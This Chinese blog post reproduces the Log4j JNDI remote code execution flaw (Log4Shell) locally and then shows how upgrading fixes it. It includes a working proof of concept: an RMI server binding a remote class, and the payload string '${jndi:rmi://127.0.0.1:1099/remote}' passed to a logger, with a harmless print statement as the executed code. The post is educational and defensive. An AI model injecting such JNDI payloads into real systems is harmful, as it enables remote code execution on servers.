Log4j-2.15.0之前版本通过JNDI远程拉取代码本地执行复现

最新推荐文章于 2024-03-07 14:43:48 发布
最新推荐文章于 2024-03-07 14:43:48 发布
阅读量505 收藏 1
点赞数
分类专栏: log4j2 文章标签: java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/co_zjw/article/details/122028156
版权

1. 原理

log4j具有一个功能lookups的功能,它能够支持你在日志打印中通过简单的表达式输出操作系统、Java相关的信息,如下代码:

@Slf4j
public class Log4j2Main {

  public static void main(String[] args) {
    log.info("runtime: {}", "${java:runtime}");
    log.warn("vm: {}", "${java:vm}");
    log.error("os: {}", "${java:os}");
  }
}

输入为

2021-12-19 16:41:30,241 1 [main] INFO Log4j2Main: runtime: Java(TM) SE Runtime Environment (build 1.8.0_301-b09) from Oracle Corporation
2021-12-19 16:41:30,243 1 [main] WARN Log4j2Main: vm: Java HotSpot(TM) 64-Bit Server VM (build 25.301-b09, mixed mode)
2021-12-19 16:41:30,243 1 [main] ERROR Log4j2Main: os: Mac OS X 10.16 unknown, architecture: x86_64-64

这里使用到的lookup功能其实底层是基于Java的JNDI的,而JNDI支持远程方法调用(RMI)。

2. 复现

现在我们来启动一个远程服务,在上面注册一个JNDI,代码如下:

import com.sun.jndi.rmi.registry.ReferenceWrapper;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;
import javax.naming.Reference;

/**
 * @author zjwblog <co.zjwblog@gmail.com>
 * @version 1.0
 */
public class RMIServer {

  public static void main(String[] args) throws Exception {
    LocateRegistry.createRegistry(1099);
    Registry registry = LocateRegistry.getRegistry();

    Reference reference = new Reference("com.zjw.log4jbug.RemoteObject", "com.zjw.log4jbug.RemoteObject", null);
    ReferenceWrapper wrapper = new ReferenceWrapper(reference);
    registry.bind("remote", wrapper);

  }
}

并提供com.zjw.log4jbug.RemoteObject类

package com.zjw.log4jbug;

/**
 * @author zjwblog <co.zjwblog@gmail.com>
 * @version 1.0
 */
public class RemoteObject {

  static {
    System.out.println("用于攻击服务器要执行的代码...");
  }
}

然后我们修改之前的Log4j2Main代码如下

import lombok.extern.slf4j.Slf4j;

/**
 * @author zjwblog <co.zjwblog@gmail.com>
 * @version 1.0
 */
@Slf4j
public class Log4j2Main {
  public static void main(String[] args) {
    String name = "${jndi:rmi://127.0.0.1:1099/remote}";
    log.info("Hello: {}", name);
  }
}

最终运行结果如下:

用于攻击服务器要执行的代码…
读者不难发现,这里输出的结果为我启动的远程JDNI服务里面提供的类的静态代码块

结论:总结一下,就是在我们本地的服务器上执行了远端服务器上定义的代码,如果这段代码有恶意,那么就会造成重大经济损失。

3. 修复

修复方法有两种,网上也有很多资料,可以使用参数禁用掉lookups功能,也可以升级到新的安全版本,当这个BUG被报告之后,官方也发布了新的版本,对其进行修复,可以升级到新的log4j版本,如下

<dependency>
  <groupId>org.apache.logging.log4j</groupId>
  <artifactId>log4j-slf4j-impl</artifactId>
  <version>2.15.0</version>
</dependency>
<dependency>
  <groupId>org.apache.logging.log4j</groupId>
  <artifactId>log4j-core</artifactId>
  <version>2.15.0</version>
</dependency>
<dependency>
  <groupId>org.apache.logging.log4j</groupId>
  <artifactId>log4j-api</artifactId>
  <version>2.15.0</version>
</dependency>

升级之后运行代码如下:

2021-12-19 17:06:51,741 1 [main] INFO Log4j2Main: Hello: ${jndi:rmi://127.0.0.1:1099/remote}

可以看见name定义的指令没有被执行。

4. 影响范围

该BUG对使用log4j作为日志框架的项目都会造成重大安全隐患,对对外提供服务的WEB项目更是致命,例如一个场景,用户输入用户名进行注册,刚好服务端会使用log4j记录系统组册的用户名,攻击者在用户名中输入类似${jndi:rmi://127.0.0.1:1099/remote}的指令代码,则会导致服务器运行第三方定义的代码,造成服务器重大安全问题。

筑梦之人
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
log4j-2.15.0-rc2.zip
12-10
log4j 漏洞修复 jar
使用 JNDI远程客户端进行 EJB 调用
“罐装面包”的博客
01-17 525
参考官方:https://docs.jboss.org/author/display/AS71/EJB%20invocations%20from%20a%20remote%20client%20using%20JNDI.html 1. 首先,暴露一个接口给远程客户端 定义一个接口,其方法 echo 的作用就是重复客户端发送的消息 public interface Echo { public String echo(String message); } 定义它的实现类 @State..
Apache Log4j漏洞解决,log4j版本升级2.15.0
热门推荐
Java码农杂谈
12-17 1万+
文章目录前言一、查看当前log4j版本二、升级log4j版本 前言    log4j发生了巨大漏洞,可以在远程直接在服务器上执行多种操作,被戏称log4shell,众多公司面临解决log4j漏洞问题,本文主要介绍log4j升级版本相关 一、查看当前log4j版本 首先需要确认下当前项目是否引入了log4j?引入的log4j版本是多少?有些项目可能没有直接引入,但引入的其他组件中使用了log4j,所以需要仔细排查一下! 这里,我们可以使用IDEA编译器带的maven s.
log4j-core-2.15.0.jar log4j-2.15.0-rc2
12-10
Apache log4j2零日漏洞,根据 log4j-2.15.0-rc2 版本编译生成log4j-api-2.15.0.jar 1.解压你的jar jar xvf XXX.jar 2. 删除旧版本jar cd ./BOOT-INF/lib rm -rf log4j-api-*.jar 3. 上传新版本log4j-api-2.15.0.jar 4. 将解压后的文件重新打包 jar cvfM0 XXX.jar BOOT-INF META-INF org 5. 启动测试 java -jar XXX.jar
log4j-core-2.15.0.jar
12-14
根据官网编译最新的log4j2版本,可以解决当前出现的log4j2漏洞
log4j-2.15.0-rc2
12-13
log4j-2.15.0-rc2中,主要修复了JNDI注入漏洞(CVE-2021-44228),这是由于日志配置中的某些特性允许恶意输入触发远程代码执行。此漏洞的影响范围广泛,因此更新至这个修复版本至关重要。开发者应该立即检查他们的...
log4j-2.15.0-rc1.zip
12-10
1. 下载:访问Apache官方网站获取Log4j 2.15.0-rc1的源码包(log4j-2.15.0-rc1.tar.gz)或预编译的二进制包(log4j-2.15.0-rc1.zip)。 2. 替换旧版本:备份现有Log4j库,然后替换为新版本的JAR文件。 3. 配置调整...
2021年12月10日最新编译的log4j-2.15.0-rc2
12-10
在2021年的12月,Log4j框架出现了一个严重安全漏洞,被称为“Log4Shell”(CVE-2021-44228),允许远程攻击者通过精心构造的日志消息执行任意代码。这个漏洞影响了大量使用Log4j的系统,促使开发团队迅速发布了...
log4j-core-2.15.0-rc2.jar
12-10
Apache Log4j2 远程代码执行漏洞(CVE-2021-44228)修复版本2.0.15-rc2(jar包名称仍为2.15.0,源码编译出来的)
命令注入_JNDI注入远程命令执行
weixin_34897593的博客
01-08 3829
在2016年的BlackHat上,@pwntester分享了通过JNDI注入进行RCE利用的方法。JNDI注入利用方式比较简单。我们先看一下poc代码。首先在攻击机上部署恶意代码exp.class。exp.class放在http://127.0.0.1:8001/目录下,所以攻击机需要开启http服务和rmi服务。import java.io.IOException;import jav...
【转载】二次通告--Apache log4j-2.15.0-rc1版本存在绕过风险,请广大用户尽快更新版本
jason的java世界
12-10 1109
【转载自360众测】 Apache Log4j2是一个基于Java的日志记录工具。该工具重写了Log4j框架,并且引入了大量丰富的特性。我们可以控制日志信息输送的目的地为控制台、文件、GUI组件等,通过定义每一条日志信息的级别,能够更加细致地控制日志的生成过程。该日志框架被大量用于业务系统开发,用来记录日志信息。 2021年12月09日,360漏洞云监测到Apache 官方于2021年12月07日发布了log4j-2.15.0-rc1版本。经360漏洞云安全专家研...
Log4j2 JNDI漏洞复现测试
sleetdream的博客
12-15 1286
一、系统环境 组件 版本 Ubuntu 20.04 二、简要说明 1、jar包说明 名称 作用 hacker-0.0.1-SNAPSHOT.jar 攻击者 target-0.0.1-SNAPSHOT.jar 攻击目标 2、攻击说明 (1)hacker启动一个RMI服务,端口号1099,绑定了evil路径,返回“com.example.target.service.HackerTest”的依赖。 (2)target记录一条日志,内容为“${jndi:rmi://lo
log4j 版本冲突 log4j-1.2.6.jar 和 log4j-1.2.15.jar
JasonYao的程序猿路
05-06 3404
<br />两个系统,用的不同的log4j的包,结果放在一起部署,较新的包会去找旧版本的类的方法,包方法找不到。<br />较新的包Logger 有个trace的方法,而旧版本的却没有。<br />然后统一用了较新版本的 : log4j-1.2.15.jar
Java代码审计】JNDI注入篇
最新发布
大河之犬的博客
03-07 2025
JNDI (Java Naming and Directory Interface )是 Java 提供的 Java 命名和目录接口。通过调用 JNDI 的 API 可以定位资源和其他程序对象。JNDIJava EE 的重要部分,JNDI 可访问的现有的目录及服务有:JDBC、LDAP、RMI、DNS、NIS、CORBA为了在命名服务或目录服务中绑定 Java 对象,可以使用 Java 序列化来传输对象,但有时候不太合适,比如 Java 对象较大的情况。
复现】Apache Log4j2 远程代码执行漏洞
趣学程序
12-14 874
Apache Log4j2 远程代码执行漏洞 漏洞描述 Apache Log4j是Apache的一个开源项目,Apache log4j2是Log4j的升级版本,我们可以控制日志信息输送的目的地为控制台、文件、GUI组件等,通过定义每一条日志信息的级别,能够更加细致地控制日志的生成过程。 漏洞影响版本: 2.0 <= Apache Log4j 2 <= log4j-2.15.0-rc1 复现 仅个人学习总结 效果 MyServer.java package server;
Apache Log4j2 远程代码执行漏洞 2.15.0(CVE-2021-44228)
weixin_44047654的博客
01-09 2116
Apache Log4j2 远程代码执行漏洞< 2.15.0(CVE-2021-44228)
spring-boot-starter-log4j2漏洞修复方式
dhj8933的博客
12-14 4113
spring-boot-starter-log4j2漏洞修复方式
log4j-2.15.0-rc2在window下编译过程
Demon的博客
12-13 1676
一、安装maven 点击这里下载最新maven官方下载 下载完成之后配置好环境变量 mvn -v 二、下载jdk jdk8 jdk9 jdk11 三、配置maven的conf/toolchains.xml <toolchain> <type>jdk</type> <provides> <version>1.8</version> <vendor>oracle</vendor> &l
Apache Log4j 2.15.0未发现漏洞曝光
qq_43529978的博客
12-17 1699
整理:、左耳 出品:CSDN 12月7日游戏平台Minecraft用户在网上曝光Apache Log4j 2存在漏,攻击者可直接构造恶意请求,触发远程代码执行该漏洞。Apache Log4j 作为一款优秀的Java日志框架,被大量的主流开源框架采用,如Apache Struts2、Apache Solr、Apache Druid、Apache Flink等,这样的一个使用广泛的底层框架出现问题,对全球多家企业及个人造成了严重危害。虽然Apache Log4j在当天就发布了2.15.0-rc1版本且在.
Log4j2安全漏洞复现及解决
Log4j2中,如果日志消息包含特定的JNDI LDAP(轻量级目录访问协议)或RMI(远程方法调用)格式的引用,攻击者可以通过构造恶意的日志输入来触发远程代码执行。 文档中提供的`pom.xml`片段展示了如何创建一个...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值